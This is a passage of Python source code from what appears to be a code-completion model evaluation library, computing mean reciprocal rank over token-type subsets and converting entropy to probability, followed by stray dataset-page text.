            of_context_length = [(val / n if n != 0 else 0.0, n) for (val, n) in of_context_length_cumul]
        else:
            of_context_length = None
        evaluation_results[token_type_subset] = EvaluationResult(tokens, list(map(lambda tt: tt.__name__, all_token_types)),
                                                                 res, sum / count if count else 0., of_context_length)
    return evaluation_results
def mrr(model: TrainedModel, line: str, extension: str, append_eof: bool,
        token_type_subsets: Optional[Set[TokenTypeSubset]] = None) \
        -> Dict[TokenTypeSubset, EvaluationResult]:
    """Compute mean reciprocal rank of the model's predictions for *line*.

    Changes the state of the model!

    For every token the model's top-N suggestions are queried; the inverse
    rank of the actual token (0.0 when it is absent from the suggestions)
    is recorded for tokens whose type belongs to the subset, ``None``
    otherwise. The aggregate is the mean inverse rank over counted tokens.
    """
    token_type_subsets = token_type_subsets or {TokenTypeSubset.full_set()}
    evaluation_results: Dict[TokenTypeSubset, EvaluationResult] = {}
    # Fix: the original wrote `for token_type_subsets in token_type_subsets`,
    # rebinding the iterated collection's name inside the loop. Use a
    # distinct singular name for the loop variable.
    for token_type_subset in token_type_subsets:
        inverse_rank_sum = .0
        count = 0
        inverse_ranks: List[Optional[float]] = []
        all_tokens: List[str] = []
        all_token_types: List[str] = []
        for predictions, prep_token, token_type in \
                model.get_predictions_and_feed(line, extension,
                                               n_suggestions=DEFAULT_N_MODEL_SUGGESTIONS,
                                               append_eof=append_eof):
            all_tokens.append(prep_token)
            all_token_types.append(token_type.__name__)
            predicted_tokens = list(map(lambda p: p[0], predictions))
            if token_type_subset.contains(token_type):
                try:
                    rank = predicted_tokens.index(prep_token) + 1
                    inverse_rank = 1. / rank
                except ValueError:  # actual token is not in prediction list
                    inverse_rank = 0.
                inverse_rank_sum += inverse_rank
                inverse_ranks.append(inverse_rank)
                count += 1
            else:
                inverse_ranks.append(None)
        # NOTE(review): with zero counted tokens this reports a perfect MRR
        # of 1.0, whereas bin_entropy defaults to 0.0 in the analogous case —
        # confirm the asymmetry is intentional.
        evaluation_results[token_type_subset] = EvaluationResult(
            all_tokens, all_token_types, inverse_ranks,
            inverse_rank_sum / count if count else 1.)
    return evaluation_results
Metric = Callable[[TrainedModel, List[str], str, bool, Optional[Set[TokenTypeSubset]], Dict[Type, float], int],
Dict[TokenTypeSubset, EvaluationResult]]
def entropy_to_probability(entropy: float) -> float:
    """Map a cross-entropy value in bits to the corresponding probability (2^-H).

    >>> entropy_to_probability(0.0)
    1.0
    >>> entropy_to_probability(1.0)
    0.5
    >>> entropy_to_probability(3.0)
    0.125
    >>> entropy_to_probability(100.0)
    7.888609052210118e-31
    """
    exponent = -entropy
    return 2.0 ** exponent
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.